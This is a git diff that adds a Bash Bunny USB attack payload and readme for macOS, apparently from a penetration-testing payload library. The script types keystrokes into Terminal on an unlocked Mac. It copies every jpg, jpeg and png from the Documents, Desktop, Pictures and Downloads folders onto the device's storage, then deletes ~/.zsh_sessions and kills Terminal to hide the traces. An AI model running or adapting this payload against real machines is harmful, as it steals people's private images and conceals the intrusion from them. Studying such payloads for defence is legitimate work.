diff --git a/payloads/library/exfiltration/MacPhotoExfill/payload.txt b/payloads/library/exfiltration/MacPhotoExfill/payload.txt new file mode 100644 index 000000000..e2ed4f90b --- /dev/null +++ b/payloads/library/exfiltration/MacPhotoExfill/payload.txt @@ -0,0 +1,69 @@ +#!/bin/bash +# +# Title: MacPhotoExfill +# Author: afsh4ck +# Version: 1.0 +# Target: MacOS +# Category: Exfiltration +# +# Exfilter all the images from the principal folders on unlocked MacOS targets. +# Stashes them in /loot/MacPhotoExfill +# +# Purple Setup +# Amber..............Attack Mode ON +# Green..............Finished + +LED SETUP +ATTACKMODE HID STORAGE ECM_ETHERNET +GET TARGET_HOSTNAME +QUACK DELAY 1000 + +lootdir=loot/MacPhotoExfill/$TARGET_HOSTNAME +mkdir -p /root/udisk/$lootdir + +QUACK GUI SPACE +QUACK DELAY 1000 +QUACK STRING terminal +QUACK ENTER +QUACK DELAY 2000 + +LED ATTACK + +QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents; +QUACK ENTER +QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Desktop; +QUACK ENTER +QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Pictures; +QUACK ENTER +QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads; +QUACK ENTER +QUACK STRING cp Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ; +QUACK ENTER +QUACK STRING cp Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ; +QUACK ENTER +QUACK STRING cp Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ; +QUACK ENTER +QUACK STRING cp Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ; +QUACK ENTER +# We can control the time for the payload execution +QUACK DELAY 25000 +QUACK CTRL C +# Cleanup and delete proofs +LED M SLOW +QUACK ENTER +QUACK ENTER +# Eject BB storage +QUACK STRING diskutil eject /Volumes/BashBunny/ +QUACK ENTER +QUACK DELAY 500 +# Remove terminal history from current session (commands used in attack won't be visible with the history command) +QUACK STRING rm -r ~/.zsh_sessions +QUACK ENTER +QUACK DELAY 500 +# Exit terminal +QUACK STRING killall Terminal +QUACK ENTER +# Ensure sincronization +sync + +LED FINISH \ No newline at end of file diff --git a/payloads/library/exfiltration/MacPhotoExfill/readme.md b/payloads/library/exfiltration/MacPhotoExfill/readme.md new file mode 100644 index 000000000..9e9e1bb76 --- /dev/null +++ b/payloads/library/exfiltration/MacPhotoExfill/readme.md @@ -0,0 +1,50 @@ +# Mac Photo Exfilter for the BashBunny + + +* ___ ___ ___ ___ ___ ___ ___ +* / /\ / /\ / /\ /__/\ / /\ / /\ /__/| +* / /::\ / /:/_ / /:/_ \ \:\ / /::\ / /:/ | |:| +* / /:/\:\ / /:/ /\ / /:/ /\ \__\:\ / /:/\:\ / /:/ | |:| +* / /:/ /::\ / /:/ /:// /:/ /::\ ___ / /::\ / /:/ /::\ / /:/ ___ __| |:| +* /__/:/ /:/\:\/__/:/ /://__/:/ /:/\:\/__/\ /:/\:\/__/:/ /:/\:\/__/:/ / /\/__/\_|:|____ +* \ \:\/:/__\/\ \:\/:/ \ \:\/:/ /:/\ \:\/:/__\/\ \:\/:/__\/\ \:\ / /:/\ \:\/:::::/ +* \ \::/ \ \::/ \ \::/ /:/ \ \::/ \ \::/ \ \:\ /:/ \ \::/--- +* \ \:\ \ \:\ \__\/ /:/ \ \:\ \ \:\ \ \:\/:/ \ \:\ +* \ \:\ \ \:\ /__/:/ \ \:\ \ \:\ \ \::/ \ \:\ +* \__\/ \__\/ \__\/ \__\/ \__\/ \__\/ \__\/ + + +* Author: afsh4ck +* Version: 1.0 +* Target: MacOS +* Tested on: Ventura 13.3.1 +* Category: Exfiltration + +# DESCRIPTION + +Exfilter all the images from the principal folders on unlocked MacOS targets. +Stashes them in /loot/MacPhotoExfill/$hostname grouped in subfolders: + +| Subfolder | Content | +| ------------------ | -------------------------------------------- | +| Documents | All the images in /root/Documents folder | +| Desktop | All the images in /root/Desktop folder | +| Pictures | All the images in /root/Pictures folder | +| Downloads | All the images in /root/Downloads folder | + +# IMAGE FORMATS + +| Format | +| ------------------ | +| .jpg | +| .jpeg | +| .png | + +# LED STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Green | Setup | +| Yellow Blink | Attack Mode ON | +| Purple Slow | Cleaning all proofs | +| Green Fixed | Finish |